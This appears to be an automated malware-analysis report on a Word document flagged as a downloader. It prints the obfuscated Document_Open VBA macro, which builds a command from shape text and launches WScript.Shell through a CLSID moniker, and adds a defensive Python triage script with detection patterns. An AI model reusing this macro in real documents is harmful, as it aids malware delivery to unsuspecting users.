Verdict: MALICIOUS
Risk Score: 202
Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
- T1105 Ingress Tool Transfer
The sample contains a VBA macro that runs automatically when the document is opened (Document_Open). The visible source is padded with dead arithmetic on undefined variables and Select Case skeletons guarded by On Error Resume Next; the live statements read the text of a shape named "RwUlPHjq" (Shapes(...).TextFrame.TextRange.Text), concatenate it into a string, and instantiate a COM object with GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8"). That CLSID is WScript.Shell, so the command to run is stored in the document body rather than in the macro, which is why no download URL appears in the source. The download-and-execute classification rests on the ClamAV signature Doc.Downloader.Sload-6781308-0 and on the compiled p-code containing auto-exec and execution tokens, not on a URL in the macro. The one extracted URL, http://schemas.openxmlformats.org/drawingml/2006/main, is the standard DrawingML XML namespace present in ordinary Office documents and is not an indicator.
Heuristics (6)
- ClamAV: Doc.Downloader.Sload-6781308-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Downloader.Sload-6781308-0
- VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]: Document contains VBA macro code
- Document_Open macro [high, OLE_VBA_DOCOPEN]: Document_Open macro, which runs automatically when the document is opened
- GetObject call [high, OLE_VBA_GETOBJ]: GetObject call, here with a "new:" CLSID moniker that instantiates a COM object without naming its ProgID
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
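The following is an added example, not part of the analyzer output or of the oletools project: a small static triage pass over decoded VBA source that checks for the three things the heuristics above key on: an auto-exec entry point, a GetObject("new:<CLSID>") moniker resolved against a short table of well-known CLSIDs, and a command string assembled from shape text rather than from literals in the macro. It also separates genuine indicator URLs from OOXML namespace URIs like the one this report extracted. The sample macro is constructed from the fragments shown in the preview below (junk arithmetic trimmed); the CLSID table, regexes and scoring thresholds are the author's own assumptions, not the analyzer's rules.

```python
"""Static triage of decoded VBA source for auto-exec, new: monikers and shape-text payloads.

Added example (not analyzer or oletools code). CLSID table, regexes and scoring are
the author's assumptions.  Run: python3 vba_triage.py
"""
import re
from dataclasses import dataclass, field

# Well-known CLSIDs reachable through GetObject("new:<CLSID>"); extend as needed.
KNOWN_CLSIDS = {
    "72C24DD5-D70A-438B-8A42-98424B88AFB8": "WScript.Shell",
    "13709620-C279-11CE-A49E-444553540000": "Shell.Application",
}

# XML namespace URIs present in every OOXML/DrawingML body; no signal as "URLs".
FORMAT_NAMESPACE_PREFIXES = (
    "http://schemas.openxmlformats.org/",
    "http://schemas.microsoft.com/office/",
)

AUTOEXEC_RE = re.compile(
    r"^\s*(?:Private\s+|Public\s+)?Sub\s+"
    r"(Document_Open|AutoOpen|Auto_Open|Workbook_Open|AutoExec|Document_Close|AutoClose)\s*\(",
    re.I | re.M,
)
NEW_MONIKER_RE = re.compile(r'"new:([0-9A-Fa-f-]{36})"')
SHAPE_RE = re.compile(r'Shapes\s*\(\s*"([^"]+)"\s*\)', re.I)
SHAPE_TEXT_RE = re.compile(r"\.TextFrame\.TextRange\.Text\b", re.I)
EXEC_RE = re.compile(
    r"\b(?:Shell|ShellExecute|WinExec|CreateObject|URLDownloadToFile)\b|\.(?:Run|Exec)\b", re.I
)
URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.I)
# Dead-code padding seen in the sample: error suppression and Select Case skeletons.
JUNK_RE = re.compile(r"^\s*(?:On Error Resume Next|Select Case\b|End Select\b|Case\s+\d+)", re.I | re.M)


@dataclass
class Triage:
    autoexec: list
    new_monikers: dict          # CLSID -> resolved ProgID, or "unknown"
    shapes_read: list
    reads_shape_text: bool
    exec_tokens: list
    indicator_urls: list        # URLs that are not format namespaces
    junk_statements: int
    code_lines: int
    findings: list = field(default_factory=list)


def is_format_namespace_url(url: str) -> bool:
    return url.lower().startswith(FORMAT_NAMESPACE_PREFIXES)


def triage_vba(src: str) -> Triage:
    code = [ln for ln in src.splitlines() if ln.strip() and not ln.lstrip().startswith("Attribute ")]
    monikers = {c.upper(): KNOWN_CLSIDS.get(c.upper(), "unknown") for c in NEW_MONIKER_RE.findall(src)}
    t = Triage(
        autoexec=AUTOEXEC_RE.findall(src),
        new_monikers=monikers,
        shapes_read=SHAPE_RE.findall(src),
        reads_shape_text=bool(SHAPE_TEXT_RE.search(src)),
        exec_tokens=sorted({m.group(0) for m in EXEC_RE.finditer(src)}),
        indicator_urls=[u for u in URL_RE.findall(src) if not is_format_namespace_url(u)],
        junk_statements=len(JUNK_RE.findall(src)),
        code_lines=len(code),
    )
    if t.autoexec:
        t.findings.append("auto-exec entry point: " + ", ".join(t.autoexec))
    for clsid, name in t.new_monikers.items():
        t.findings.append(f'GetObject("new:{clsid}") instantiates {name} without naming its ProgID')
    if t.shapes_read and t.reads_shape_text:
        t.findings.append("command string built from shape text (" + ", ".join(t.shapes_read)
                          + "), not from literals in the macro")
    if t.code_lines and t.junk_statements / t.code_lines > 0.25:
        t.findings.append(f"junk-code padding: {t.junk_statements} of {t.code_lines} statements are dead control flow")
    return t


def verdict(t: Triage) -> str:
    shell_object = any(n in ("WScript.Shell", "Shell.Application") for n in t.new_monikers.values())
    if t.autoexec and (shell_object or t.exec_tokens):
        return "malicious"
    if t.autoexec or t.new_monikers or t.reads_shape_text or t.exec_tokens:
        return "suspicious"
    return "clean"


# Constructed from the fragments in this report's macro preview (junk arithmetic trimmed).
SAMPLE_MACRO = '''Attribute VB_Name = "zoHJoUz"
Private Sub Document_open()
On Error Resume Next
BqkJiXns = (FOFstp - Oct(azLNriKt) * JMtja - Sgn(331368044) - 181447307 + Fix(kbqOJVIz) + 1432961429 + 89689110 / 280139426 / MPnoQoc)
Select Case EpSfqzVL
Case 300649379
tGmVHS = CLng(332245823)
RcCQVVU = Int(ztZFPm)
Case 140676053
fvILXKAwD = Hex(64583075)
jrqHVq = CStr(282885729 * CByte(AinTzLb))
End Select
Set lowHlsq = Shapes("RwUlPHjq")
On Error Resume Next
QSkBzcU = "" + tZsvDYQ + wLDSr + JnqWd + NvVimpzo + lowHlsq.TextFrame.TextRange.Text + rwrjZYQF + jEpdwwnP
Set JYjRlSwWl = CVar(GetObject(qCFuHRm + "new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + lYdZiQM))
End Sub
'''

# Constructed benign contrast: an auto-exec macro that only edits document text.
BENIGN_MACRO = '''Sub Document_Open()
ActiveDocument.Sections(1).Headers(1).Range.Text = "Draft"
End Sub
'''

if __name__ == "__main__":
    for name, src in (("sample", SAMPLE_MACRO), ("benign", BENIGN_MACRO)):
        t = triage_vba(src)
        print(f"[{name}] verdict={verdict(t)}")
        for f in t.findings:
            print("  -", f)
```

The benign contrast shows why Document_Open alone is only medium-confidence: an auto-exec entry point with no shell object, exec token or indirection is graded suspicious, while the sample is graded malicious because the auto-exec handler instantiates WScript.Shell through a CLSID moniker. Feed the output of olevba (or the macros.bas artifact above) into triage_vba to reproduce the report's reasoning on your own samples.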
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7040 bytes | f16d12012d2f7635e363d826d5baa6aa621a8c6219c60d7ef841b3c547b8cd82 |
Preview script (macros.bas): first 1,000 lines of the extracted script
Attribute VB_Name = "zoHJoUz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
BqkJiXns = (FOFstp - Oct(azLNriKt) * JMtja - Sgn(331368044) - 181447307 + Fix(kbqOJVIz) + 1432961429 + 89689110 / 280139426 / MPnoQoc)
Select Case EpSfqzVL
Case 300649379
tGmVHS = CLng(332245823)
RcCQVVU = Int(ztZFPm)
Case 140676053
fvILXKAwD = Hex(64583075)
jrqHVq = CStr(282885729 * CByte(AinTzLb))
End Select
Set lowHlsq = Shapes("RwUlPHjq")
On Error Resume Next
uqprQulJ = (IHXSks - Oct(fSWdA) * wjdwVt - Sgn(303694568) - 190570515 + Fix(jNXTV) + 2344482859# + 53687732 / 117608939 / ZTwEHrwiz)
Select Case oCzhj
Case 208605210
JNRZsPowX = CLng(63435898)
RXQXAaEjS = Int(YmAmwonHm)
Case 211192889
naauAVhEI = Hex(38418890)
iDRZpRBW = CStr(195066050 * CByte(NCkbRnvbA))
End Select
On Error Resume Next
qhZYsQczk = (nFwDvzwpm - Oct(GqsMjzv) * PUPYsNhdq - Sgn(270413307) - 128855088 + Fix(XALNOiQV) + 1908553249 + 199878868 / 59562398 / ofoAp)
Select Case otVkjQ
Case 226544584
NlVSGJ = CLng(143107923)
AFifz = Int(iZOlL)
Case 61731571
MZjndAaL = Hex(252489118)
vfzVfA = CStr(71322589 * CByte(zkkijVK))
End Select
On Error Resume Next
SZbilU = (MDYAKSX - Oct(zCXqzzjt) * hEAvU - Sgn(146964750) - 50084979 + Fix(vNPLAdddd) + 2563797619# + 242499748 / 26827115 / ijsVXBtFY)
Select Case mfbwjUf
Case 292031861
RGOEIZwZ = CLng(296409540)
WKvpBD = Int(HZwVOoX)
Case 281339467
jZjzJzu = Hex(24648401)
sPikwYbA = CStr(296751683 * CByte(MqqZs))
End Select
QSkBzcU = "" + tZsvDYQ + wLDSr + JnqWd + NvVimpzo + lowHlsq.TextFrame.TextRange.Text + rwrjZYQF + jEpdwwnP
On Error Resume Next
rPYrLFauT = (jKJCUUqhm - Oct(wmjfLGoJ) * kWscTHBO - Sgn(201441410) - 86964472 + Fix(VHfCwYnf) + 1047835649 + 80761009 / 284454312 / ZQrFj)
Select Case fFQQGiboi
Case 279959587
TFLUGQrGd = CLng(218013151)
TJtbtVSM = Int(BSWzHPF)
Case 294930
bJqwjwGfj = Hex(128193366)
AwGLr = CStr(252287051 * CByte(WfoGV))
End Select
On Error Resume Next
iziwVjptY = (AIjRf - Oct(FBpVq) * RraYj - Sgn(87342993) - 295198615 + Fix(ZwfMW) + 2999382479# + 23347277 / 269184193 / DtYhMZRN)
Select Case WjGwjJEi
Case 213608615
YwzcASdB = CLng(189830309)
vlzQVm = Int(SSFSJLv)
Case 279284846
zbPVIo = Hex(86329633)
QkERXP = CStr(230004311 * CByte(otqliqc))
End Select
On Error Resume Next
uPiZKbSW = (oppZE - Oct(icWBhicpi) * wuUWW - Sgn(111491129) - 98857996 + Fix(WMFaJ) + 633991789 + 217301941 / 13237198 / KsAGwO)
Select Case uMmmWFS
Case 174258594
YMjwAmYah = CLng(21955953)
lITNUfQRw = Int(uBfrcKic)
Case 240124919
ufakzA = Hex(23256696)
YUaZtW = CStr(280211172 * CByte(tZRroAdR))
End Select
On Error Resume Next
PpHAKICsF = (LonEKEFY - Oct(cVfFwCf) * BkRlFvNdm - Sgn(250148089) - 4944434 + Fix(wkGqMjloX) + 3149300569# + 128102856 / 200907557 / khbkkJwi)
Select Case AIovGt
Case 173740225
YSEZdrP = CLng(266004172)
OQrVFQmFV = Int(msCcBT)
Case 228101125
wCRcsNwX = Hex(3306283)
GGpLwru = CStr(226964738 * CByte(tvrBplfo))
End Select
Set JYjRlSwWl = CVar(GetObject(qCFuHRm + "new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + lYdZiQM))
On Error Resume Next
onlNj = (AjsLBHI - Oct(NzBYAtaQ) * GDzmRhjIq - Sgn(154100708) - 106055946 + Fix(ubITTwn) + 1539430549 + 272405717 /
... (truncated)